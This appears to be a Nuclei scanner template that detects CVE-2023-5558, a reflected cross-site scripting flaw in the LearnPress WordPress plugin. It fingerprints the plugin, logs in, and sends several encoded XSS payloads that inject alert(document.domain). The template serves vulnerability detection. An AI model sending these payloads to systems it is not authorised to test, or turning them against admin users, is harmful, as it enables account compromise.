id: CVE-2023-5558

info:
  name: LearnPress < 4.2.5.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Allows attackers to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5558
    cwe-id: CWE-79
    epss-score: 0.00046
    epss-percentile: 0.15636
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 6
    vendor: thimpress
    product: learnpress
    framework: wordpress
  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the plugin; the match is internal, so it only gates request 2.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "/wp-content/plugins/learnpress"
        internal: true

  # Request 2: authenticate (template is tagged "authenticated"), then request each payload path.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - '?param=value%22%27%3Balert(document.domain)%3C!--'
        - '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
        - '?%27-alert(%60XSS%60)-%27=a'
        - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"';alert(document.domain)"